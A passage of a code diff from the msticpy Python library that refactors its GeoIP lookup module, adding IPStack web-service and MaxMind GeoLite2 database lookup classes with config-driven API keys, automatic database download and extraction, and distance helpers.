+from .._version import VERSION
+from ..common.exceptions import MsticpyUserConfigError
+from ..common.provider_settings import ProviderSettings, get_provider_settings
+from ..common.pkg_config import current_config_path
+from ..common.utility import export
+from ..datamodel.entities import GeoLocation, IpAddress
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
+__author__ = "Ian Hellen"
+
+
+class GeoIPDatabaseException(Exception):
+    """Exception when GeoIP database cannot be found."""
+
+
+class GeoIpLookup(metaclass=ABCMeta):
+    """
+    Abstract base class for GeoIP Lookup classes.
+
+    See Also
+    --------
+    IPStackLookup : IPStack GeoIP Implementation
+    GeoLiteLookup : MaxMind GeoIP Implementation
 
+    """
 
-class GeoIpLookup(ABC):
-    """Abstract base class for GeoIP Lookup classes."""
+    _LICENSE_TXT: Optional[str] = None
+    _LICENSE_HTML: Optional[str] = None
+    _license_shown: bool = False
+
+    def __init__(self):
+        """Initialize instance of GeoIpLookup class."""
+        self._print_license()
 
     @abstractmethod
-    def lookup_ip(self, ip_address: str = None, ip_addr_list: Iterable = None,
-                  ip_entity: IpAddress = None):
+    def lookup_ip(
+        self,
+        ip_address: str = None,
+        ip_addr_list: Iterable = None,
+        ip_entity: IpAddress = None,
+    ) -> Tuple[List[Any], List[IpAddress]]:
         """
-        Lookup IP location.
-
-        Keyword Arguments:
-            ip_address {str} -- a single address to look up (default: {None})
-            ip_addr_list {Iterable} -- a collection of addresses to lookup (default: {None})
-            ip_entity {IpAddress} -- an IpAddress entity
+        Lookup IP location abstract method.
+
+        Parameters
+        ----------
+        ip_address : str, optional
+            a single address to look up (the default is None)
+        ip_addr_list : Iterable, optional
+            a collection of addresses to lookup (the default is None)
+        ip_entity : IpAddress, optional
+            an IpAddress entity (the default is None) - any existing
+            data in the Location property will be overwritten
+
+        Returns
+        -------
+        Tuple[List[Any], List[IpAddress]]:
+            raw geolocation results and same results as IpAddress entities with
+            populated Location property.
 
-        Returns:
-            tuple(list{dict}, list{entity}) -- returns raw geolocation results and
-                same results as IP/Geolocation entities
+        """
 
+    def df_lookup_ip(self, data: pd.DataFrame, column: str) -> pd.DataFrame:
         """
+        Lookup Geolocation data from a pandas Dataframe.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            pandas dataframe containing IpAddress column
+        column : str
+            the name of the dataframe column to use as a source
 
-    def df_lookup_ip(self, data: pd.DataFrame, column: str):
+        Returns
+        -------
+        pd.DataFrame
+            Copy of original dataframe with IP Location information columns
+            appended (where a location lookup was successful)
+
+        """
+        return data.merge(
+            self.lookup_ips(data, column),
+            how="left",
+            left_on=column,
+            right_on="IpAddress",
+        )
+
+    def lookup_ips(self, data: pd.DataFrame, column: str) -> pd.DataFrame:
         """
         Lookup Geolocation data from a pandas Dataframe.
 
-        Keyword Arguments:
-            data {pd.DataFrame} -- pandas dataframe containing IpAddress column
-            column {str} -- the name of the dataframe column to use as a source
+        Parameters
+        ----------
+        data : pd.DataFrame
+            pandas dataframe containing IpAddress column
+        column : str
+            the name of the dataframe column to use as a source
+
+        Returns
+        -------
+        pd.DataFrame
+            IpLookup results as DataFrame.
+
         """
-        ip_list = data[column].values
+        ip_list = list(data[column].values)
         _, entities = self.lookup_ip(ip_addr_list=ip_list)
 
-        ip_dicts = [ent.Location.properties().update(IpAddress=ent.Address)
-                    for ent in entities]
-        df_out = pd.DataFrame(data=ip_dicts)
-        return data.merge(df_out, left_on=column, right_on='IpAddress')
+        ip_dicts = [
+            {**ent.Location.properties, "IpAddress": ent.Address}
+            for ent in entities
+            if ent.Location is not None
+        ]
+        return pd.DataFrame(data=ip_dicts)
+
+    # pylint: disable=protected-access
+    def _print_license(self):
+        if self.__class__._license_shown:
+            return
+        if self._LICENSE_HTML and get_ipython():
+            display(HTML(self._LICENSE_HTML))
+        elif self._LICENSE_TXT:
+            print(self._LICENSE_TXT)
+        self.__class__._license_shown = True
+
+    # pylint: enable=protected-access
 
 
 @export
 class IPStackLookup(GeoIpLookup):
     """
-    GeoIP Lookup using IPStack web service.
+    IPStack GeoIP Implementation.
 
-    Raises:
-        ConnectionError -- Invalid status returned from http request
-        PermissionError -- Service refused request (e.g. requesting batch of addresses
-                on free tier API key)
+    See Also
+    --------
+    GeoIpLookup : Abstract base class
+    GeoLiteLookup : MaxMind GeoIP Implementation
 
     """
 
-    _IPSTACK_API = 'http://api.ipstack.com/{iplist}?access_key={access_key}'
+    _LICENSE_HTML = """
+This library uses services provided by ipstack.
+<a href="https://ipstack.com">https://ipstack.com</a>"""
+
+    _LICENSE_TXT = """
+This library uses services provided by ipstack (https://ipstack.com)"""
+
+    _IPSTACK_API = "http://api.ipstack.com/{iplist}?access_key={access_key}&output=json"
 
-    def __init__(self, api_key):
+    _NO_API_KEY_MSSG = """
+No API Key was found to access the IPStack service.
+If you do not have an account, go here to create one and obtain and API key.
+
+Add this API key to your msticpyconfig.yaml
+After adding the key run the following commands to reload your settings and retry:
+    import msticpy
+    msticpy.settings.refresh_config()
+
+Alternatively, you can pass this to the IPStackLookup class when creating it:
+>>> iplookup = IPStackLookup(api_key="your_api_key")
+"""
+
+    def __init__(self, api_key: Optional[str] = None, bulk_lookup: bool = False):
         """
         Create a new instance of IPStackLookup.
 
-        Arguments:
-            api_key {str} -- API Key from IPStack - see https://ipstack.com
-        """
-        self._api_key = api_key
+        Parameters
+        ----------
+        api_key : str, optional
+            API Key from IPStack - see https://ipstack.com
+            default is None - obtain key from msticpyconfig.yaml
+        bulk_lookup : bool, optional
+            For Professional and above tiers allowing you to
+            submit multiple IPs in a single request.
+            (the default is False, which submits a single request
+            per address)
 
-    def lookup_ip(self, ip_address: str = None, ip_addr_list: Iterable = None,
-                  ip_entity: IpAddress = None):
+        """
+        super().__init__()
+
+        self.settings = _get_geoip_provider_settings("IPStack")
+        self._api_key = api_key or self.settings.args.get("AuthKey")
+        if not self._api_key:
+            raise MsticpyUserConfigError(
+                self._NO_API_KEY_MSSG,
+                help_uri=(
+                    "https://msticpy.readthedocs.io/en/latest/data_acquisition/"
+                    + "GeoIPLookups.html#ipstack-geo-lookup-class"
+                ),
+                service_uri="https://ipstack.com/product",
+                title="IPStack API key not found",
+            )
+        self.bulk_lookup = bulk_lookup
+
+    def lookup_ip(
+        self,
+        ip_address: str = None,
+        ip_addr_list: Iterable = None,
+        ip_entity: IpAddress = None,
+    ) -> Tuple[List[Any], List[IpAddress]]:
         """
         Lookup IP location from IPStack web service.
 
-        Keyword Arguments:
-            ip_address {str} -- a single address to look up (default: {None})
-            ip_addr_list {Iterable} -- a collection of addresses to lookup (default: {None})
-            ip_entity {IpAddress} -- an IpAddress entity
-
-        Raises:
-            ConnectionError -- Invalid status returned from http request
-            PermissionError -- Service refused request (e.g. requesting batch of addresses
-                on free tier API key)
-
-        Returns:
-            tuple(list{dict}, list{entity}) -- returns raw geolocation results and
-                same results as IP/Geolocation entities
+        Parameters
+        ----------
+        ip_address : str, optional
+            a single address to look up (the default is None)
+        ip_addr_list : Iterable, optional
+            a collection of addresses to lookup (the default is None)
+        ip_entity : IpAddress, optional
+            an IpAddress entity (the default is None) - any existing
+            data in the Location property will be overwritten
+
+        Returns
+        -------
+        Tuple[List[Any], List[IpAddress]]:
+            raw geolocation results and same results as IpAddress entities with
+            populated Location property.
+
+        Raises
+        ------
+        ConnectionError
+            Invalid status returned from http request
+        PermissionError
+            Service refused request (e.g. requesting batch of addresses
+            on free tier API key)
 
         """
         if ip_address and isinstance(ip_address, str):
             ip_list = [ip_address.strip()]
         elif ip_addr_list:
-            ip_list = (ip.strip() for ip in ip_addr_list)
+            ip_list = [ip.strip() for ip in ip_addr_list]
         elif ip_entity:
             ip_list = [ip_entity.Address]
         else:
-            raise ValueError('No valid ip addresses were passed as arguments.')
-
-        results, status = self._submit_request(ip_list)
-        if status != 200:
-            raise ConnectionError('Error reponse from server: ' + str(status))
-
-        # {"success":false,"error":{"code":303,"type":"batch_not_supported_on_plan",
-        # "info":"Bulk requests are not supported on your plan.
-        # Please upgrade your subscription."}}
-
-        if 'success' in results and not results["success"]:
-            raise PermissionError('Service unable to complete request. Error: {}'
-                                  .format(results['error']))
+            raise ValueError("No valid ip addresses were passed as arguments.")
 
-        output_raw = list(results)
+        results = self._submit_request(ip_list)
+        output_raw = []
         output_entities = []
-        if isinstance(results, list):
-            for ip_loc in results:
+        for ip_loc, status in results:
+            if status == 200 and "error" not in ip_loc:
                 output_entities.append(self._create_ip_entity(ip_loc, ip_entity))
-        else:
-            output_entities.append(self._create_ip_entity(results, ip_entity))
-
+            output_raw.append((ip_loc, status))
         return output_raw, output_entities
 
-    def _create_ip_entity(self, ip_loc: dict, ip_entity):
+    @staticmethod
+    def _create_ip_entity(ip_loc: dict, ip_entity) -> IpAddress:
         if not ip_entity:
             ip_entity = IpAddress()
-            ip_entity.Address = ip_loc['ip']
+            ip_entity.Address = ip_loc["ip"]
         geo_entity = GeoLocation()
-        geo_entity.CountryCode = ip_loc['country_code']
-
-        geo_entity.CountryName = ip_loc['country_name']
-        geo_entity.State = ip_loc['region_name']
-        geo_entity.City = ip_loc['city']
-        geo_entity.Longitude = ip_loc['longitude']
-        geo_entity.Latitude = ip_loc['latitude']
-        if 'connection' in ip_loc:
-            geo_entity.Asn = ip_loc['connection']['asn']
+        geo_entity.CountryCode = ip_loc["country_code"]
+
+        geo_entity.CountryName = ip_loc["country_name"]
+        geo_entity.State = ip_loc["region_name"]
+        geo_entity.City = ip_loc["city"]
+        geo_entity.Longitude = ip_loc["longitude"]
+        geo_entity.Latitude = ip_loc["latitude"]
+        if "connection" in ip_loc:
+            geo_entity.Asn = ip_loc["connection"]["asn"]
         ip_entity.Location = geo_entity
         return ip_entity
 
-    def _submit_request(self, ip_list):
+    def _submit_request(self, ip_list: List[str]) -> List[Tuple[Dict[str, str], int]]:
         """
         Submit the request to IPStack.
 
-            :param ip_list: Comma-separated string list of IPs to look up
+        Parameters
+        ----------
+        ip_list : List[str]
+            String list of IPs to look up
+
+        Returns
+        -------
+        List[Tuple[str, int]]
+            List of response, status code pairs
+
         """
-        submit_url = self._IPSTACK_API.format(iplist=ip_list, access_key=self._api_key)
-        response = requests.get(submit_url)
+        if not self.bulk_lookup:
+            return self._lookup_ip_list(ip_list)
+
+        submit_url = self._IPSTACK_API.format(
+            iplist=",".join(ip_list), access_key=self._api_key
+        )
+        response = httpx.get(submit_url)
 
         if response.status_code == 200:
-            return response.json(), response.status_code
-        else:
-            if response:
-                try:
-                    return response.json(), response.status_code
-                except JSONDecodeError:
-                    pass
-            return None, response.status_code
+            results = response.json()
+            # {"success":false,"error":{"code":303,"type":"batch_not_supported_on_plan",
+            # "info":"Bulk requests are not supported on your plan.
+            # Please upgrade your subscription."}}
+
+            if "success" in results and not results["success"]:
+                raise PermissionError(
+                    f"Service unable to complete request. Error: {results['error']}"
+                )
+            return [(item, response.status_code) for item in results]
+
+        if response:
+            try:
+                return [(response.json(), response.status_code)]
+            except JSONDecodeError:
+                pass
+        return [({}, response.status_code)]
+
+    def _lookup_ip_list(self, ip_list: List[str]):
+        """Lookup IP Addresses one-by-one."""
+        ip_loc_results = []
+        with httpx.Client() as client:
+            for ip_addr in ip_list:
+                submit_url = self._IPSTACK_API.format(
+                    iplist=ip_addr, access_key=self._api_key
+                )
+                response = client.get(submit_url)
+                if response.status_code == 200:
+                    ip_loc_results.append((response.json(), response.status_code))
+                elif response:
+                    try:
+                        ip_loc_results.append((response.json(), response.status_code))
+                        continue
+                    except JSONDecodeError:
+                        ip_loc_results.append((None, response.status_code))
+                else:
+                    print("Unknown response from IPStack request.")
+                    ip_loc_results.append((None, -1))
+        return ip_loc_results
 
 
 @export
@@ -181,131 +372,565 @@ class GeoLiteLookup(GeoIpLookup):
     """
     GeoIP Lookup using MaxMindDB database.
 
-    Raises:
-        ConnectionError -- Invalid status returned from http request
-        PermissionError -- Service refused request (e.g. requesting batch of addresses
-                on free tier API key)
+    See Also
+    --------
+    GeoIpLookup : Abstract base class
+    IPStackLookup : IPStack GeoIP Implementation
 
     """
 
-    _MAXMIND_DOWNLOAD = 'https://dev.maxmind.com/geoip/geoip2/geolite2/#Downloads'
-    _DB_FILE = 'GeoLite2-City.mmdb'
+    _MAXMIND_DOWNLOAD = (
+        "https://download.maxmind.com/app/geoip_download?"
+        + "edition_id=GeoLite2-City&license_key={license_key}&suffix=tar.gz"
+    )
 
-    def __init__(self):
-        """Return new instance of GeoLiteLookup class."""
-        self._reader = geolite2.reader()
-        last_mod_time = datetime.fromtimestamp(os.path.getmtime(geolite2.filename))
-        db_age = datetime.utcnow() - last_mod_time
-        if db_age > timedelta(40):
-            print(f'{self._DB_FILE} is over one month old. Update the maxminddb package')
-            print(f'to refresh or download a new version from {self._MAXMIND_DOWNLOAD}')
-
-    def lookup_ip(self, ip_address: str = None, ip_addr_list: Iterable = None,
-                  ip_entity: IpAddress = None):
-        """
-        Lookup IP location from IPStack web service.
+    _DB_HOME = str(Path.joinpath(Path("~").expanduser(), ".msticpy", "GeoLite2"))
+    _DB_ARCHIVE = "GeoLite2-City.mmdb.{rand}.tar.gz"
+    _DB_FILE = "GeoLite2-City.mmdb"
 
-        Keyword Arguments:
-            ip_address {str} -- a single address to look up (default: {None})
-            ip_addr_list {Iterable} -- a collection of addresses to lookup (default: {None})
+    _LICENSE_HTML = """
+This product includes GeoLite2 data created by MaxMind, available from
+<a href="https://www.maxmind.com">https://www.maxmind.com</a>.
+"""
 
-        Returns:
-            tuple(list{dict}, list{entity}) -- returns raw geolocation results and
-                same results as IP/Geolocation entities
+    _LICENSE_TXT = """
+This product includes GeoLite2 data created by MaxMind, available from
+https://www.maxmind.com.
+"""
+
+    _NO_API_KEY_MSSG = """
+No API Key was found to download the Maxmind GeoIPLite database.
+If you do not have an account, go here to create one and obtain and API key.
+https://www.maxmind.com/en/geolite2/signup
+
+Add this API key to your msticpyconfig.yaml
+https://msticpy.readthedocs.io/en/latest/data_acquisition/GeoIPLookups.html#maxmind-geo-ip-lite-lookup-class.
+Alternatively, you can pass this to the GeoLiteLookup class when creating it:
+>>> iplookup = GeoLiteLookup(api_key="your_api_key")
+"""
+
+    def __init__(
+        self,
+        api_key: Optional[str] = None,
+        db_folder: Optional[str] = None,
+        force_update: bool = False,
+        auto_update: bool = True,
+        debug: bool = False,
+    ):
+        r"""
+        Return new instance of GeoLiteLookup class.
+
+        Parameters
+        ----------
+        api_key : str, optional
+            Default is None - use configuration value from msticpyconfig.yaml.
+            API Key from MaxMind -
+            Read more about GeoLite2 : https://dev.maxmind.com/geoip/geoip2/geolite2/
+            Sign up for a MaxMind account:
+            https://www.maxmind.com/en/geolite2/signup
+            Set your password and create a license key:
+            https://www.maxmind.com/en/accounts/current/license-key
+        db_folder: str, optional
+            Provide absolute path to the folder containing MMDB file
+            (e.g. '/usr/home' or 'C:/maxmind').
+            If no path provided, it is set to download to .msticpy/GeoLite2
+            under user`s home directory.
+        force_update : bool, optional
+            Force update can be set to true or false. depending on it,
+            new download request will be initiated.
+        auto_update: bool, optional
+            Auto update can be set to true or false. depending on it,
+            new download request will be initiated if age criteria is matched.
+        debug : bool, optional
+            Print additional debugging information, default is False.
 
         """
+        super().__init__()
+
+        self._debug = debug
+        if self._debug:
+            dbg_api_key = (
+                "None" if api_key is None else api_key[:4] + "*" * (len(api_key) - 4)
+            )
+            self._pr_debug(f"__init__ params: api_key={dbg_api_key}")
+            self._pr_debug(f"    db_folder={db_folder}")
+            self._pr_debug(f"    force_update={force_update}")
+            self._pr_debug(f"    auto_update={auto_update}")
+        self.settings = _get_geoip_provider_settings("GeoIPLite")
+        self._api_key = api_key or self.settings.args.get("AuthKey")
+
+        self._dbfolder = db_folder
+        if self._dbfolder is None:
+            self._dbfolder = self.settings.args.get("DBFolder", self._DB_HOME)
+        self._dbfolder = str(Path(self._dbfolder).expanduser())  # type: ignore
+        self._force_update = force_update
+        self._auto_update = auto_update
+        self._dbpath: Optional[str] = None
+        self._reader: Any = None
+
+    def close(self):
+        """Close an open GeoIP DB."""
+        if self._reader:
+            try:
+                self._reader.close()
+            except Exception as err:  # pylint: disable=broad-except
+                print(f"Exception when trying to close GeoIP DB {err}")
+
+    def lookup_ip(
+        self,
+        ip_address: str = None,
+        ip_addr_list: Iterable = None,
+        ip_entity: IpAddress = None,
+    ) -> Tuple[List[Any], List[IpAddress]]:
+        """
+        Lookup IP location from GeoLite2 data created by MaxMind.
+
+        Parameters
+        ----------
+        ip_address : str, optional
+            a single address to look up (the default is None)
+        ip_addr_list : Iterable, optional
+            a collection of addresses to lookup (the default is None)
+        ip_entity : IpAddress, optional
+            an IpAddress entity (the default is None) - any existing
+            data in the Location property will be overwritten
+
+        Returns
+        -------
+        Tuple[List[Any], List[IpAddress]]
+            raw geolocation results and same results as IpAddress entities with
+            populated Location property.
+
+        """
+        self._check_db_open()
         if ip_address and isinstance(ip_address, str):
             ip_list = [ip_address.strip()]
         elif ip_addr_list:
-            ip_list = (ip.strip() for ip in ip_addr_list)
+            ip_list = [ip.strip() for ip in ip_addr_list]
         elif ip_entity:
             ip_list = [ip_entity.Address]
         else:
-            raise ValueError('No valid ip addresses were passed as arguments.')
+            raise ValueError("No valid ip addresses were passed as arguments.")
 
         output_raw = []
         output_entities = []
+        ip_cache: Dict[str, Any] = {}
         for ip_input in ip_list:
-            geo_match = self._reader.get(ip_input)
+            geo_match = None
+            try:
+                geo_match = ip_cache.get(ip_input, self._reader.city(ip_input).raw)
+            except (AddressNotFoundError, AttributeError, ValueError):
+                continue
             if geo_match:
                 output_raw.append(geo_match)
-                output_entities.append(self._create_ip_entity(ip_input, geo_match, ip_entity))
+                output_entities.append(
+                    self._create_ip_entity(ip_input, geo_match, ip_entity)
+                )
 
         return output_raw, output_entities
 
-    def _create_ip_entity(self, ip_address, geo_match: dict, ip_entity):
+    @staticmethod
+    def _create_ip_entity(
+        ip_address: str, geo_match: Mapping[str, Any], ip_entity: IpAddress = None
+    ) -> IpAddress:
         if not ip_entity:
             ip_entity = IpAddress()
             ip_entity.Address = ip_address
         geo_entity = GeoLocation()
-        geo_entity.CountryCode = geo_match.get('country', {}).get('iso_code', None)
-        geo_entity.CountryName = geo_match.get('country', {}).get('names', {}).get('en', None)
-        subdivs = geo_match.get('subdivisions', [])
+        geo_entity.CountryCode = geo_match.get("country", {}).get("iso_code", None)
+        geo_entity.CountryName = (
+            geo_match.get("country", {}).get("names", {}).get("en", None)
+        )
+        subdivs = geo_match.get("subdivisions", [])
         if subdivs:
-            geo_entity.State = subdivs[0].get('names', {}).get('en', None)
-        geo_entity.City = geo_match.get('city', {}).get('names', {}).get('en', None)
-        geo_entity.Longitude = geo_match.get('location', {}).get('longitude', None)
-        geo_entity.Latitude = geo_match.get('location', {}).get('latitude', None)
+            geo_entity.State = subdivs[0].get("names", {}).get("en", None)
+        geo_entity.City = geo_match.get("city", {}).get("names", {}).get("en", None)
+        geo_entity.Longitude = geo_match.get("location", {}).get("longitude", None)
+        geo_entity.Latitude = geo_match.get("location", {}).get("latitude", None)
         ip_entity.Location = geo_entity
         return ip_entity
 
+    def _pr_debug(self, *args):
+        """Print out debug info."""
+        if self._debug:
+            print(*args)
+
+    @staticmethod
+    def _geolite_warn(mssg):
+        warnings.warn(
+            f"GeoIpLookup: {mssg}",
+            UserWarning,
+        )
+
+    def _check_db_open(self):
+        """Check if DB reader open with a valid database."""
+        if self._reader:
+            return
+        self._check_and_update_db(self._dbfolder, self._force_update, self._auto_update)
+        self._dbpath = self._get_geoip_dbpath(self._dbfolder)
+        if self._debug:
+            dbg_api_key = (
+                "None"
+                if self._api_key is None
+                else self._api_key[:4] + "*" * (len(self._api_key) - 4)
+            )
+            self._pr_debug(f"__init__ values (inc settings): api_key={dbg_api_key}")
+            self._pr_debug(f"    db_folder={self._dbfolder}")
+            self._pr_debug(f"    force_update={self._force_update}")
+            self._pr_debug(f"    auto_update={self._auto_update}")
+            self._pr_debug(f"    dbpath={self._dbpath}")
+            self._pr_debug(f"Using config file: {current_config_path()}")
+
+        if not self._dbpath:
+            raise MsticpyUserConfigError(
+                "No usable GeoIP Database could be found.",
+                (
+                    "Check that you have correctly configured the Maxmind API key in "
+                    "msticpyconfig.yaml."
+                ),
+                (
+                    "If you are using a custom DBFolder setting in your config, "
+                    + f"check that this is a valid path: {self._dbfolder}."
+                ),
+                (
+                    "If you edit your msticpyconfig to change this setting run the "
+                    "following commands to reload your settings and retry:"
+                    "    import msticpy"
+                    "    msticpy.settings.refresh_config()"
+                ),
+                help_uri=(
+                    "https://msticpy.readthedocs.io/en/latest/data_acquisition/"
+                    + "GeoIPLookups.html#maxmind-geo-ip-lite-lookup-class"
+                ),
+                service_uri="https://www.maxmind.com/en/geolite2/signup",
+                title="Maxmind GeoIP database not found",
+            )
+        self._reader = geoip2.database.Reader(self._dbpath)
+
+    def _check_and_update_db(
+        self,
+        db_folder: str = None,
+        force_update: bool = False,
+        auto_update: bool = True,
+    ):
+        r"""
+        Check the age of geo ip database file and download if it older than 30 days.
+
+        User can set auto_update or force_update to True or False to
+        override auto-download behavior.
+
+        Parameters
+        ----------
+        db_folder: str, optional
+            Provide absolute path to the folder containing MMDB file
+            (e.g. '/usr/home' or 'C:\maxmind').
+            If no path provided, it is set to download to .msticpy\GeoLite2 dir under
+            user`s home directory.
+        force_update : bool, optional
+            Force update can be set to true or false. depending on it,
+            new download request will be initiated, overriding age criteria.
+        auto_update : bool, optional
+            Auto update can be set to true or false. depending on it,
+            new download request will be initiated if age criteria is matched.
 
-_MM_LICENSE_HTML = '''
-This product includes GeoLite2 data created by MaxMind, available from
-<a href="https://www.maxmind.com">https://www.maxmind.com</a>.
-'''
-_MM_LICENSE_TXT = '''
-This product includes GeoLite2 data created by MaxMind, available from
-https://www.maxmind.com.
-'''
-_IPSTACK_LICENSE_HTML = '''
-This library uses services provided by ipstack.
-<a href="https://ipstack.com">https://ipstack.com</a>'''
+        """
+        geoip_db_path = self._get_geoip_dbpath(db_folder)
+        url = self._MAXMIND_DOWNLOAD.format(license_key=self._api_key)
+        self._pr_debug(f"Checking geoip DB {geoip_db_path}")
+        self._pr_debug(f"Download URL is {self._MAXMIND_DOWNLOAD}")
+        if geoip_db_path is None:
+            print(
+                "No local Maxmind City Database found. ",
+                f"Attempting to downloading new database to {db_folder}",
+            )
+            self._download_and_extract_archive(url, db_folder)
+        else:
+            # Create a reader object to retrive db info and build date
+            # to check age from build_epoch property.
+            with geoip2.database.Reader(geoip_db_path) as reader:
+                last_mod_time = datetime.utcfromtimestamp(reader.metadata().build_epoch)
+
+            # Check for out of date DB file according to db_age
+            db_age = datetime.utcnow() - last_mod_time
+            db_updated = True
+            if db_age > timedelta(30) and auto_update:
+                print(
+                    "Latest local Maxmind City Database present is older than 30 days.",
+                    f"Attempting to download new database to {db_folder}",
+                )
+                if not self._download_and_extract_archive(url, db_folder):
+                    self._pr_debug("DB download failed")
+                    self._geolite_warn("DB download failed")
+                    db_updated = False
+            elif force_update:
+                print(
+                    "force_update is set to True.",
+                    f"Attempting to download new database to {db_folder}",
+                )
+                if not self._download_and_extract_archive(url, db_folder):
+                    self._pr_debug("DB download failed")
+                    self._geolite_warn("DB download failed")
+                    db_updated = False
+            if not db_updated:
+                self._pr_debug("Continuing with cached database.")
+                self._geolite_warn(
+                    "Continuing with cached database. Results may inaccurate."
+                )
+
+    # pylint: disable=too-many-branches
+    def _download_and_extract_archive(  # noqa: MC0001
+        self, url: str = None, db_folder: str = None
+    ) -> bool:
+        r"""
+        Download file from the given URL and extract if it is archive.
+
+        Parameters
+        ----------
+        url : str
+            Web URL location to the Maxmind city Database. (the default is None)
+        db_folder: str, optional
+            Provide absolute path to the folder containing MMDB file
+            (e.g. '/usr/home' or 'C:\maxmind').
+            If no path provided, it is set to download to .msticpy dir under
+            user`s home directory.(the default is None)
+
+        Returns
+        -------
+        bool :
+            True if download_success
 
-_IPSTACK_LICENSE_TXT = 'This library uses services provided by ipstack (https://ipstack.com)'
+        """
+        if not self._api_key:
+            return False
+        if url is None:
+            url = self._MAXMIND_DOWNLOAD.format(license_key=self._api_key)
+
+        if db_folder is None:
+            db_folder = self._DB_HOME
+
+        if not Path(db_folder).exists():
+            # using makedirs to create intermediate-level dirs to contain the leaf dir
+            Path(db_folder).mkdir(exist_ok=True, parents=True)
+        rand_int = random.randint(10000, 99999)  # nosec
+        db_archive_path = Path(db_folder).joinpath(
+            self._DB_ARCHIVE.format(rand=rand_int)
+        )
+        self._pr_debug(f"Downloading GeoLite DB: {db_archive_path}")
+        try:
+            # wait a small rand amount of time in case multiple procs try
+            # to download simultaneously
+            sleep(rand_int / 500000)
+            if list(Path(db_folder).glob(self._DB_ARCHIVE.format(rand="*"))):
+                # Some other process is downloading
+                return True
+            with httpx.stream("GET", url) as response:
+                print("Downloading and extracting GeoLite DB archive from MaxMind....")
+                with open(db_archive_path, "wb") as file_hdl:
+                    for chunk in response.iter_bytes(chunk_size=10000):
+                        file_hdl.write(chunk)
+                        file_hdl.flush()
+            self._pr_debug(f"Downloaded GeoLite DB: {db_archive_path}")
+        except httpx.HTTPError as http_err:
+            self._pr_debug(
+                f"HTTP error occurred trying to download GeoLite DB: {http_err}"
+            )
+            self._geolite_warn(
+                f"HTTP error occurred trying to download GeoLite DB: {http_err}"
+            )
+        # pylint: disable=broad-except
+        except Exception as err:
+            self._pr_debug(f"Other error occurred trying to download GeoLite DB: {err}")
+            self._geolite_warn(
+                f"Other error occurred trying to download GeoLite DB: {err}"
+            )
+        # pylint: enable=broad-except
+        else:
+            try:
+                self._extract_to_folder(db_archive_path, db_folder)
+                print(
+                    "Extraction complete. Local Maxmind city DB:", f"{db_archive_path}"
+                )
+                return True
+            except PermissionError as err:
+                self._pr_debug(
+                    f"Error writing GeoIP DB file: {db_archive_path} - {err}"
+                )
+                self._geolite_warn(
+                    f"Cannot overwrite GeoIP DB file: {db_archive_path}."
+                    + " The file may be in use or you do not have"
+                    + f" permission to overwrite.\n - {err}"
+                )
+            except Exception as err:  # pylint: disable=broad-except
+                # There are several exception types that might come from
+                # unpacking a tar.gz
+                self._pr_debug(
+                    f"Error writing GeoIP DB file: {db_archive_path} - {err}"
+                )
+                self._geolite_warn(
+                    f"Error writing GeoIP DB file: {db_archive_path} - {err}"
+                )
+        finally:
+            if db_archive_path.is_file():
+                self._pr_debug(f"Removing temp file {db_archive_path}")
+                db_archive_path.unlink()
+        return False
+
+    # pylint: enable=too-many-branches
+
+    def _extract_to_folder(self, db_archive_path, db_folder):
+        self._pr_debug(f"Extracting tarfile {db_archive_path}")
+        with tarfile.open(db_archive_path) as tar_archive:
+            for member in tar_archive.getmembers():
+                if not member.isreg():
+                    continue
+                # Will skip the dirs to extract only file objects
+                self._pr_debug(f"extracting {member} to {db_folder}")
+                tar_archive.extract(member, db_folder)
+                # The files are extract to a subfolder (with a date in the name)
+                # We want to move these into the main folder above this.
+                targetname = Path(member.name).name
+                if targetname != member.name:
+                    curr_file = Path(db_folder).joinpath(member.name)
+                    extr_folder = Path(db_folder).joinpath(member.name).parent
+                    curr_file.replace(Path(db_folder).joinpath(targetname))
+                    self._pr_debug(f"Moving to {Path(db_folder).joinpath(targetname)}")
+                    # if the folder is empty, remove it
+                    if not list(extr_folder.glob("*")):
+                        extr_folder.rmdir()
+
+    @staticmethod
+    def _get_geoip_dbpath(db_folder: str = None) -> Optional[str]:
+        r"""
+        Get the correct path containing GeoLite City Database.
+
+        Parameters
+        ----------
+        db_folder: str, optional
+            Provide absolute path to the folder containing MMDB file
+            (e.g. '/usr/home' or 'C:\maxmind').
+            If no path provided, it is set to download to .msticpy\GeoLite2 dir under
+            user`s home directory.
+
+        Returns
+        -------
+        Optional[str]
+            Returns the absolute path of local maxmind geolite city
+            database after control flow logic.
 
-if not get_ipython():
-    print(_MM_LICENSE_TXT)
-    print(_IPSTACK_LICENSE_TXT)
-else:
-    display(HTML(_MM_LICENSE_HTML))
-    display(HTML(_IPSTACK_LICENSE_HTML))
+        """
+        if not db_folder:
+            db_folder = "."
+        list_of_db_paths = [str(db) for db in Path(db_folder).glob("*.mmdb")]
+
+        if len(list_of_db_paths) > 1:
+            latest_db_path = max(list_of_db_paths, key=os.path.getmtime)
+        elif len(list_of_db_paths) == 1:
+            latest_db_path = list_of_db_paths[0]
+        else:
+            return None
 
+        return latest_db_path
 
-def geo_distance(origin: Tuple[float, float],
-                 destination: Tuple[float, float]) -> float:
+
+def _get_geoip_provider_settings(provider_name: str) -> ProviderSettings:
     """
-    Calculate the Haversine distance.
+    Return settings for a provider.
 
-    Author: Martin Thoma - stackoverflow
+    Parameters
+    ----------
+    provider_name : str
+        Name of the provider.
+
+    Returns
+    -------
+    ProviderSettings
+        Settings for the provider.
+
+    """
+    settings = get_provider_settings(config_section="OtherProviders")
+    if provider_name in settings:
+        return settings[provider_name]
+    return ProviderSettings(name=provider_name, description="Not found.")
+
+
+@export
+def entity_distance(ip_src: IpAddress, ip_dest: IpAddress) -> float:
+    """
+    Return distance between two IP Entities.
 
     Parameters
     ----------
-    origin : tuple of float
-        (lat, long)
-    destination : tuple of float
-        (lat, long)
+    ip_src : IpAddress
+        Source/Origin IpAddress Entity
+    ip_dest : IpAddress
+        Destination IpAddress Entity
 
     Returns
     -------
-    distance_in_km : float
+    float
+        Distance in kilometers.
+
+    Raises
+    ------
+        AttributeError
+            If either entity has no location information
+
+    """
+    if not ip_src.Location or not ip_dest.Location:
+        raise AttributeError(
+            "Source and destination entities must have defined Location properties."
+        )
+
+    return geo_distance(
+        origin=(ip_src.Location.Latitude, ip_src.Location.Longitude),
+        destination=(ip_dest.Location.Latitude, ip_dest.Location.Longitude),
+    )
+
+
+_EARTH_RADIUS_KM = 6371  # km
+
+
+@export
+def geo_distance(
+    origin: Tuple[float, float], destination: Tuple[float, float]
